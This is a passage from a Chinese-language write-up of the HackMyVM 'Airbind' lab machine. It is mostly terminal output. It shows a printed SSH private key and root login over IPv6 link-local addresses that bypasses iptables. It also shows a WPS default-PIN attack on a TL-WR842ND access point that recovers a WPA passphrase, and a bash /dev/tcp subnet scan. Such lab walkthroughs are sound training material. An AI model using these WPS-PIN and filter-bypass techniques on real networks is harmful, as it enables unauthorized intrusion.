root@ubuntu:~\/.ssh# cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAzhi8CwvvtsKmKafXglHqWyCTjiy4wSfUkwGlQkJ+flYthTVBAJ\/L\nGxPkEjSi5G6eBYyME9Pm8xBbacS1Jbr18IYIPYy0fu9j7MXRTpvYTITHIrk3g2oLs+2f+I\nhZqm1cVr4MgTjxl62\/hcZoIZoALz02uFzmdiOc19mrrD+cVoop0gpG5VMI6pCwF3fiK17q\nWbyjt62i7VsrhQ8kMWaT7HXBK30k06EyBlUK4sRLarr\/rMCqSCqJ\/TwJP3cs4d+5LssLxY\nRIxJMh6B94mT7K3MA034e4PpUz8frw1eT7FyUd8XGsipWuKAmwPVymNGEQFvKaGJ6IMLF6\nb5KFReygmfYkGBLNjhP1waDU7NxqVriKN59DGebMfvW8rIll\/sIPqyEJOTr+7EF74Dv03q\nneH2hMrgu7Duonn7sM9DUgAu9CRXai3cxPFQMokmEZbblfwwJWaw94w4cqzVsenX5GQxFb\nAUfSYDdrY+qmO8+xr9FP14DbfPbvn+Cof0G4sL99AAAFgCRJ8E8kSfBPAAAAB3NzaC1yc2\nEAAAGBAM4YvAsL77bCpimn14JR6lsgk44suMEn1JMBpUJCfn5WLYU1QQCfyxsT5BI0ouRu\nngWMjBPT5vMQW2nEtSW69fCGCD2MtH7vY+zF0U6b2EyExyK5N4NqC7Ptn\/iIWaptXFa+DI\nE48Zetv4XGaCGaAC89Nrhc5nYjnNfZq6w\/nFaKKdIKRuVTCOqQsBd34ite6lm8o7etou1b\nK4UPJDFmk+x1wSt9JNOhMgZVCuLES2q6\/6zAqkgqif08CT93LOHfuS7LC8WESMSTIegfeJ\nk+ytzANN+HuD6VM\/H68NXk+xclHfFxrIqVrigJsD1cpjRhEBbymhieiDCxem+ShUXsoJn2\nJBgSzY4T9cGg1Ozcala4ijefQxnmzH71vKyJZf7CD6shCTk6\/uxBe+A79N6p3h9oTK4Luw\n7qJ5+7DPQ1IALvQkV2ot3MTxUDKJJhGW25X8MCVmsPeMOHKs1bHp1+RkMRWwFH0mA3a2Pq\npjvPsa\/RT9eA23z275\/gqH9BuLC\/fQAAAAMBAAEAAAGAAezkutSwd1xfqYV2I7NItXO7NS\nmRS0qoN3xdMx6EaIE9GSC7e\/pCLz1TFOF1gR1QcBxVRa0l2\/Dz7avHBnR17jqOUqbhG8t4\nO0LI1wtpLKPT6WziCiIAPHzUkQGTFt7BLVVGsCFcTm6y2pjVKbUy2b4gZ\/4EMCfahAC2VB\nxfBUbyp5HtgiBxtaFG5904mW+gUFjNDb77RezjXfGbhLOg36Vk+ddINAruOPVr7dzoGHXp\nRA+jt5tgISPBsVxXaL\/Kiotyu\/mBkLU5BRe2X9cfrxfq48mfes+2QiQHzZEpd6AL5ESHO1\nzDFCSYM4HJUCSlvGYHd9Xi7EbFcQVg60d\/AI7D7q9KoVPYHf5K2gkzUAgR5LtRl9lQ+riX\nwOXviBEaC8iOF8VHB77EHdiUZHXtOovUdHqGlM98vwa8KgbUjYVaHtjYGvL0wb6Lp5jeKe\nbXcy+7W6F1IjxNKk7CSaXY00asfHpLRVwbURz\/505CqgQjBoSKKnnX\/wRZt5y35NzZAAAA\nwBbeKgaf45unZCyCXerjo4wON+ntDz1AbvUMeLDsJclnwtFdtedmrWnJZNkCVLMlX3b4q\/\nsQnz0xCD0UxkEkwaEqKrOXVPaqgSU+UdIj0e\/GObNiAfqoO4l04\/iqxs5ozh5+dzgCt7Fw\nporszJ48DU9dJ5mvgeNirRpDMJOIhf\/NZaA3YDGC4TziOl7bxMNPYuLqYED\/syjHYNVxvT\neEqNF5P4NsawKmu6ExKzgsPTRZ4PcT\/iQFsmsBozKbqUVZxwAAAMEA8fKsYXT\/AwoqExHZ\nYXcMQtAuM92isebSPv63Ssy9N+PaPsdKC6nl3CqENy3zBSE0Yo1LvclfS7gwACtedVWS2Q\nGqB6z\/q5gc2l6\/VG1s8WcG3cbUlKPzQDTsSMZ7CMYK0lMX1jvzXjwqdJ1pSxFZfMdHuJpy\n\/mxUrpsgwhbzP589qc\/UD\/FfKjPyVTm7qs8qNeJDNsjcIl0Wp59OvufRh+cAimGX1S68Er\n3H+DeE+Ymbi8e1rFN7C+HE1p6fqy3ZAAAAwQDaEQRgF2zKFz791AnRpx7I700k6q2RM1FZ\nYnsmIYfdk6EEwczZ3ed8nbH+CLmx7npdoKG5SUqx4XiELPO8qOpmNqZoHH\/1T3GxdjTRYc\ncL40NAQDN+gR4DCPO5tmc\/uojQm9Guhd7o8dQKAitjy6jrW+xDvtHNWl0gzKKZm3ndlwp7\nre+b97O6LhCm7mQ79hVX8mAyk2\/p129bzwGPtsSK3zB7zLksEKj0AlEEfiifyMjS9gNq0e\nEkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=\n-----END OPENSSH PRIVATE KEY-----\nroot@ubuntu:~\/.ssh# cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOGLwLC++2wqYpp9eCUepbIJOOLLjBJ9STAaVCQn5+Vi2FNUEAn8sbE+QSNKLkbp4FjIwT0+bzEFtpxLUluvXwhgg9jLR+72PsxdFOm9hMhMciuTeDaguz7Z\/4iFmqbVxWvgyBOPGXrb+FxmghmgAvPTa4XOZ2I5zX2ausP5xWiinSCkblUwjqkLAXd+IrXupZvKO3raLtWyuFDyQxZpPsdcErfSTToTIGVQrixEtquv+swKpIKon9PAk\/dyzh37kuywvFhEjEkyHoH3iZPsrcwDTfh7g+lTPx+vDV5PsXJR3xcayKla4oCbA9XKY0YRAW8poYnogwsXpvkoVF7KCZ9iQYEs2OE\/XBoNTs3GpWuIo3n0MZ5sx+9bysiWX+wg+rIQk5Ov7sQXvgO\/Teqd4faEyuC7sO6iefuwz0NSAC70JFdqLdzE8VAyiSYRltuV\/DAlZrD3jDhyrNWx6dfkZDEVsBR9JgN2tj6qY7z7Gv0U\/XgNt89u+f4Kh\/Qbiwv30= root@ubuntu<\/code><\/pre>\n\u7136\u540e\u63a5\u7740\u627e\uff1a<\/p>\n
root@ubuntu:~# ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 10.0.3.241\/24 brd 10.0.3.255 scope global eth0\n valid_lft forever preferred_lft forever\n inet6 fe80::dea1:f7ff:fe82:7613\/64 scope link \n valid_lft forever preferred_lft forever\n3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000\n link\/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n6: ap0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff<\/code><\/pre>\n\u89e3\u6cd5\u4e00\uff1aIPV6\u7ed5\u8fc7iptables<\/h3>\n
\u8be6\u60c5\u53c2\u8003\uff1ahttps:\/\/www.bilibili.com\/video\/BV1j442197dv\/<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ping6 -I eth0 ff02::1\nping6: Warning: source address might be selected on device other than: eth0\nPING ff02::1 (ff02::1) from :: eth0: 56 data bytes\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=1 ttl=64 time=0.025 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=1 ttl=64 time=2.10 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=2 ttl=64 time=0.031 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=2 ttl=64 time=0.806 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=3 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=3 ttl=64 time=0.742 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=4 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=4 ttl=64 time=1.08 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=5 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=5 ttl=64 time=1.33 ms\n^C\n--- ff02::1 ping statistics ---\n5 packets transmitted, 5 received, +5 duplicates, 0% packet loss, time 4031ms\nrtt min\/avg\/max\/mdev = 0.025\/0.621\/2.096\/0.683 ms\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::99b:2e02:395e:4e6f%eth0 -i id_rsa\nThe authenticity of host 'fe80::99b:2e02:395e:4e6f%eth0 (fe80::99b:2e02:395e:4e6f%eth0)' can't be established.\nED25519 key fingerprint is SHA256:8cphJbastRTfWZolTBt5XJJ1GFOq9EbCLKKGghygXSo.\nThis host key is known by the following other names\/addresses:\n ~\/.ssh\/known_hosts:33: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added 'fe80::99b:2e02:395e:4e6f%eth0' (ED25519) to the list of known hosts.\nroot@fe80::99b:2e02:395e:4e6f%eth0's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls -la\ntotal 180\ndrwxr-xr-x 2 kali kali 4096 Dec 13 22:55 .\ndrwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..\n-rw-r--r-- 1 kali kali 1808 Dec 13 22:00 51924.txt\n-rw-r--r-- 1 kali kali 81719 Dec 13 21:56 ferox-http_10_0_2_21-1734144980.state\n-rw-r--r-- 1 kali kali 5996 Dec 13 22:01 ferox-http_10_0_2_21-1734145306.state\n-rw-r--r-- 1 kali kali 61 Dec 13 22:13 hash\n-rw------- 1 kali kali 2590 Dec 13 22:55 id_rsa\n-rw-r--r-- 1 kali kali 565 Dec 13 22:55 id_rsa.pub\n-rw-r--r-- 1 kali kali 3919 Dec 13 22:30 shell.php\n-rw-r--r-- 1 kali kali 65536 Dec 13 22:05 wallos.db\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::a00:27ff:fe1b:404c%eth0 -i id_rsa\nThe authenticity of host 'fe80::a00:27ff:fe1b:404c%eth0 (fe80::a00:27ff:fe1b:404c%eth0)' can't be established.\nED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.\nThis host key is known by the following other names\/addresses:\n ~\/.ssh\/known_hosts:89: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added 'fe80::a00:27ff:fe1b:404c%eth0' (ED25519) to the list of known hosts.\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id;ls -la\nroot\nuid=0(root) gid=0(root) groupes=0(root)\ntotal 32\ndrwx------ 5 root root 4096 21 mai 2024 .\ndrwxr-xr-x 18 root root 4096 1 avril 2024 ..\nlrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc\ndrwx------ 2 root root 4096 2 avril 2024 .config\ndrwxr-xr-x 3 root root 4096 1 avril 2024 .local\n-rw-r--r-- 1 root root 161 9 juil. 2019 .profile\n-rwx------ 1 root root 33 2 avril 2024 root.txt\ndrwx------ 2 root root 4096 2 avril 2024 .ssh<\/code><\/pre>\n\u539f\u7406\u5927\u6982\u662f\u4e3b\u673a\u8bbe\u7f6e\u4e86\u4e00\u4e2aip\u7684\u8fc7\u6ee4\uff0c\u4e0d\u80fd\u4ece\u4e00\u822c\u9014\u5f84\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662fipv6\u534f\u8bae\u6070\u597d\u53ef\u4ee5\u7ed5\u8fc7\u8fd9\u4e2a\u8fc7\u6ee4\u3002<\/p>\n
\n\u4ece\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u5931\u8d25\u7684\u539f\u56e0\u53ef\u80fd\u662f\u865a\u62df\u673a\u5185\u7684\u90a3\u4e2awifi\u7f51\u5361\u548c\u6211\u672c\u5730\u7684\u7f51\u5361\u51b2\u7a81\u4e86\u3002<\/p>\n<\/blockquote>\n
\u65b9\u6cd5\u4e8c\uff1a\u4f5c\u8005\u89e3\u6cd5<\/h3>\n
\u5148\u626b\u63cf\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u5f00\u653e\u7684\u65e0\u7ebf\u7aef\u53e3\u7684\u4fe1\u606f\u3002<\/p>\n
root@ubuntu:~# iwlist wlan0 scanning\nwlan0 Scan completed :\n Cell 01 - Address: 02:00:00:00:01:00\n Channel:7\n Frequency:2.442 GHz (Channel 7)\n Quality=70\/70 Signal level=-30 dBm \n Encryption key:on\n ESSID:"TL-WR842ND"\n Bit Rates:1 Mb\/s; 2 Mb\/s; 5.5 Mb\/s; 11 Mb\/s; 6 Mb\/s\n 9 Mb\/s; 12 Mb\/s; 18 Mb\/s\n Bit Rates:24 Mb\/s; 36 Mb\/s; 48 Mb\/s; 54 Mb\/s\n Mode:Master\n Extra:tsf=0006293310197962\n Extra: Last beacon: 80ms ago\n IE: Unknown: 000A544C2D57523834324E44\n IE: Unknown: 010882848B960C121824\n IE: Unknown: 030107\n IE: Unknown: 2A0104\n IE: Unknown: 32043048606C\n IE: IEEE 802.11i\/WPA2 Version 1\n Group Cipher : CCMP\n Pairwise Ciphers (1) : CCMP\n Authentication Suites (1) : PSK\n IE: Unknown: 3B025100\n IE: Unknown: 7F080400400200000040\n IE: Unknown: DDA90050F204104A00011010440001021041000101101200020000105300022108103B00010310470010572CF82FC95756539B16B5CFB298ABF11021000754502D4C494E4B1023000A544C2D57523834324E4410240001201042001D51514848302D36465943582D45515A52502D4C585642302D37423848531054000800010050F20400011011000A544C2D57523834324E441008000221081049000E00372A0001200106FFFFFFFFFFFF<\/code><\/pre>\n\u627e\u5230\u4e86\u7248\u672c\u53f7\uff0c\u7136\u540e\u627e\u5230\u624b\u518c\uff0c\u67e5\u770b\u4e00\u4e0b\u9ed8\u8ba4pin\u7801\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5c1d\u8bd5\u4f7f\u7528wpa_supplicant<\/code>\u5bf9\u65e0\u7ebf\u8bbe\u65bd\u8fdb\u884c\u63a7\u5236\uff0c\u914d\u7f6e\u4e00\u4e0b\u6587\u4ef6\uff1a<\/p>\n<\/div><\/p>\n\/etc\/wpa_supplicant\/wpa_supplicant.conf\nctrl_interface=\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n
#~\/wpa_supplicant.conf\nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u5728\u540e\u53f0\u521d\u59cb\u5316\uff1a<\/p>\n
root@ubuntu:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B\nSuccessfully initialized wpa_supplicant\nrfkill: Cannot open RFKILL control device\nrfkill: Cannot get wiphy information<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
root@ubuntu:~# wpa_cli\nwpa_cli v2.10\nCopyright (c) 2004-2022, Jouni Malinen <j@w1.fi> and contributors\n\nThis software may be distributed under the terms of the BSD license.\nSee README for more details.\n\nSelected interface 'wlan0'\n\nInteractive mode\n\n> wps_pin any 55117319\n55117319\n<3>CTRL-EVENT-NETWORK-ADDED 0\n<3>WPS-PIN-ACTIVE \n<3>CTRL-EVENT-SCAN-STARTED \n<3>CTRL-EVENT-SCAN-RESULTS \n<3>WPS-AP-AVAILABLE-AUTH \n<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Associated with 02:00:00:00:01:00\n<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n<3>CTRL-EVENT-EAP-STARTED EAP authentication started\n<3>CTRL-EVENT-EAP-STATUS status='started' parameter=''\n<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1\n<3>CTRL-EVENT-EAP-STATUS status='accept proposed method' parameter='WSC'\n<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected\n<3>WPS-CRED-RECEIVED \n<3>WPS-SUCCESS \n<3>CTRL-EVENT-EAP-STATUS status='completion' parameter='failure'\n<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed\n<3>CTRL-EVENT-DISCONNECTED bssid=02:00:00:00:01:00 reason=3 locally_generated=1\n<3>CTRL-EVENT-DSCP-POLICY clear_all\n<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)\n<3>Associated with 02:00:00:00:01:00\n<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n<3>WPA: Key negotiation completed with 02:00:00:00:01:00 [PTK=CCMP GTK=CCMP]\n<3>CTRL-EVENT-CONNECTED - Connection to 02:00:00:00:01:00 completed [id=0 id_str=]<\/code><\/pre>\n\u53d1\u73b0\u94fe\u63a5\u4e0a\u53bb\u4e86\u3002<\/p>\n
root@ubuntu:~# dhclient wlan0\nroot@ubuntu:~# cat wpa_supplicant.conf \nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1\n\nnetwork={\n ssid="TL-WR842ND"\n psk="leEAYAejoIDJ7pU4jykJ7kCkEh3gx1"\n proto=RSN\n key_mgmt=WPA-PSK\n pairwise=CCMP-256 GCMP-256 CCMP GCMP\n group=CCMP-256 GCMP-256 CCMP GCMP TKIP\n auth_alg=OPEN\n mesh_fwding=1\n pbss=2\n}<\/code><\/pre>\nroot@ubuntu:~# route -n\nKernel IP routing table\nDestination Gateway Genmask Flags Metric Ref Use Iface\n0.0.0.0 10.0.3.1 0.0.0.0 UG 0 0 0 eth0\n10.0.3.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0\n192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0<\/code><\/pre>\n\u7136\u540e\u5c31\u662f\u5199\u811a\u672c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
#!\/bin\/bash\n\nfor ip in {1..255} ; do\n timeout 1 bash -c "echo > \/dev\/tcp\/192.168.10.$ip\/22 2>\/dev\/null"\n [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"\ndone<\/code><\/pre>\nroot@ubuntu:\/tmp# nano exp\nroot@ubuntu:\/tmp# cat exp\n#!\/bin\/bash\n\nfor ip in {1..255} ; do\n timeout 1 bash -c "echo > \/dev\/tcp\/192.168.10.$ip\/22 2>\/dev\/null"\n [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"\ndone\nroot@ubuntu:\/tmp# chmod +x *\nroot@ubuntu:\/tmp# bash exp\n192.168.10.1 UP\n^C^C^C^C^C^C^C^C^C^C\n^C^Z\n[1]+ Stopped bash exp\nroot@ubuntu:\/tmp# cd ~\nroot@ubuntu:~# ssh 192.168.10.\nssh: Could not resolve hostname 192.168.10.: Name or service not known\nroot@ubuntu:~# ssh 192.168.10.1\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\nroot@airbind:~# ls -la\ntotal 32\ndrwx------ 5 root root 4096 21 mai 2024 .\ndrwxr-xr-x 18 root root 4096 1 avril 2024 ..\nlrwxrwxrwx 1 root root 9 9 mars 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 10 avril 2021 .bashrc\ndrwx------ 2 root root 4096 2 avril 2024 .config\ndrwxr-xr-x 3 root root 4096 1 avril 2024 .local\n-rw-r--r-- 1 root root 161 9 juil. 2019 .profile\n-rwx------ 1 root root 33 2 avril 2024 root.txt\ndrwx------ 2 root root 4096 2 avril 2024 .ssh<\/code><\/pre>\n\u540c\u6837\u62ff\u5230\u4e86shell\uff0c\u5e05\u7684\u4e00\u6279\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/youtu.be\/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ<\/a><\/p>\nhttps:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Airbind\/Ctf.md<\/a><\/p>\nhttps:\/\/vishal-chandak.medium.com\/hackmyvm-airbind-2d776bc55fe1<\/a><\/p>\nhttps:\/\/blog.csdn.net\/tanbinn\/article\/details\/139784974<\/a><\/p>\n
![\"image-20241214105749024\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229359.png\")
<\/div><\/p>\n![\"image-20241214110824890\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229360.png\")
<\/div><\/p>\n![\"image-20241214112004836\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229361.png\")
<\/div>![\"image-20241214112012516\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229362.png\")
<\/div><\/p>\n![\"image-20241214113232682\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229363.png\")
<\/div><\/p>\n![\"image-20241214113328593\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229364.png\")
<\/div>![\"image-20241214113737918\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229365.png\")
<\/div><\/p>\n![\"image-20241214113845713\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229366.png\")
<\/div><\/p>\n![\"image-20241214114414574\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229367.png\")
<\/div><\/p>\n![\"image-20241214120926862\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229368.png\")
<\/div>![\"image-20241214121121612\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229369.png\")
<\/div>![\"image-20241214121158040\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229370.png\")
<\/div><\/p>\n![\"image-20241214121451498\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229371.png\")
<\/div><\/p>\n